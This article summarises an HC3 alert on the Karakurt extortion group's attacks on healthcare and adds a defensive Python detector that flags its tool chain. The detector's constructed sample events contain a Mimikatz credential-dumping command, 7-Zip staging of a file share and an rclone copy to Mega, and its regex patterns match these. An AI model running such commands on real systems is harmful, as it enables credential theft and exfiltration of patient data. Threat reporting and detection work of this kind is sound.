On Aug. 24, the Health Sector Cybersecurity Coordination Center (HC3) released an analyst note regarding the Karakurt ransomware group, also known as the Karakurt Team and Karakurt Lair—a fairly new cybercrime group that emerged in late 2021. The note stresses that the healthcare and public health sector (HPH) is a target for this group.
The note says that “Karakurt actors claim to steal data and then threaten to auction it off or release it to the public unless they receive payment of the demanded ransom, which have been known to range from $25,000 to $13,000,000 in Bitcoin, with payment deadlines typically set to expire within a week of first contact with the victim. The group likely has ties to the Conti ransomware group, either as a business relationship or as a side business with Conti. Karakurt is also known for extensive harassment campaigns against victims to shame them. HC3 recommends the Healthcare and Public Health Sector (HPH) be aware of their operations and apply appropriate cybersecurity principles and practices found in this document in defending their infrastructure and data against compromise.”
HC3 reports that at least four attacks have affected the HPH sector since June 2022, hitting an assisted living facility, a dental firm, a healthcare provider, and a hospital. Karakurt generally conducts scanning, reconnaissance, and collection against its targets for about two months. The threat actor then gains access to files containing patient names, addresses, Social Security numbers, dates of birth, medical history, diagnosis and treatment information, medical record numbers, and health insurance information, and threatens to release that information unless a ransom is paid.
The note adds that “Once access to a compromised system has been obtained, Karakurt actors deploy Cobalt Strike beacons to enumerate a network, install Mimikatz to pull plain-text credentials, use AnyDesk to obtain persistent remote control, and utilize additional situation-dependent tools to elevate privileges and move laterally within a network.
“Karakurt actors then compress (typically with 7zip) and exfiltrate large sums of data—and, in many cases, entire network-connected shared drives in volumes exceeding 1 terabyte (TB)—using open source applications and File Transfer Protocol (FTP) services, such as Filezilla, and cloud storage services including rclone and Mega.nz. Following the exfiltration of data, Karakurt actors present the victim with ransom notes by way of ‘readme.txt’ files, via emails sent to victim employees over the compromised email networks, and emails sent to victim employees from external email accounts. The ransom notes reveal the victim has been hacked by the ‘Karakurt Team’ and threaten public release or auction of the stolen data. The instructions include a link to a TOR URL with an access code. Visiting the URL and inputting the access code open a chat application over which victims can negotiate with Karakurt actors to have their data deleted.”
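As an added illustration (not from the HC3 note or this article), the following Python correlator tags constructed Sysmon-style process-creation events with the tool chain the note describes (AnyDesk for remote access, Mimikatz credential dumping, 7-Zip staging, rclone/FileZilla/Mega exfiltration) and raises a host's severity to "high" when archive staging is followed by an exfiltration tool within a time window. The event data, rule names, and the six-hour window are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Sysmon-style process-creation events (not real telemetry).
EVENTS = [
    {"host": "WS01", "ts": "2022-06-01T09:10:00", "image": r"C:\Users\j\AnyDesk.exe",
     "cmd": "AnyDesk.exe --install"},
    {"host": "WS01", "ts": "2022-06-01T09:30:00", "image": r"C:\Temp\m.exe",
     "cmd": "m.exe privilege::debug sekurlsa::logonpasswords"},
    {"host": "FS01", "ts": "2022-06-02T01:05:00", "image": r"C:\Program Files\7-Zip\7z.exe",
     "cmd": r"7z.exe a -mx1 -v2g D:\out\share.7z \\FS01\Shares"},
    {"host": "FS01", "ts": "2022-06-02T01:40:00", "image": r"C:\Tools\rclone.exe",
     "cmd": "rclone.exe copy D:\\out mega:backup --transfers 8"},
    # Benign extraction: '7z x' must not trigger the staging rule.
    {"host": "WS02", "ts": "2022-06-02T08:00:00", "image": r"C:\Program Files\7-Zip\7z.exe",
     "cmd": "7z.exe x report.zip"},
]

# (rule name, attack stage, regex over "image cmd"); tools are those named in the note.
RULES = [
    ("anydesk_persistence", "access", re.compile(r"anydesk\.exe", re.I)),
    ("mimikatz_creds", "access", re.compile(r"sekurlsa::|privilege::debug|lsadump::", re.I)),
    ("7zip_staging", "stage", re.compile(r"7za?\.exe\s+a\s", re.I)),  # '7z a' = add to archive
    ("exfil_tool", "exfil", re.compile(r"rclone\.exe|filezilla\.exe|mega(?:cmd|sync)?\.exe|\bmega:", re.I)),
]

def tag_events(events):
    """Attach every matching rule to each event; an event may match several rules."""
    tagged = []
    for e in events:
        text = f'{e["image"]} {e["cmd"]}'
        for name, stage, rx in RULES:
            if rx.search(text):
                tagged.append({**e, "rule": name, "stage": stage})
    return tagged

def correlate(events, window=timedelta(hours=6)):
    """Group hits per host; staging followed by an exfil tool inside the window is 'high'."""
    by_host = defaultdict(list)
    for t in tag_events(events):
        by_host[t["host"]].append(t)
    findings = []
    for host, hits in by_host.items():
        hits.sort(key=lambda h: h["ts"])  # ISO timestamps sort lexically
        severity = "medium"
        for s in (h for h in hits if h["stage"] == "stage"):
            t0 = datetime.fromisoformat(s["ts"])
            if any(h["stage"] == "exfil" and t0 <= datetime.fromisoformat(h["ts"]) <= t0 + window
                   for h in hits):
                severity = "high"
        findings.append({"host": host, "severity": severity, "rules": [h["rule"] for h in hits]})
    return findings
```

Hosts with only a single tagged event still surface as "medium" so that an AnyDesk install or credential-dumping command line is reviewed before the staging-then-exfiltration pattern completes.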
Victims of Karakurt have described extensive harassment campaigns by the actors. Employees, business partners, and clients of the victim receive repeated emails and phone calls urging them to pressure the victim into negotiating with the actors so that the stolen data is not released.
Mitigations recommended by CISA include implementing a recovery plan, segmenting the network, and regularly backing up data.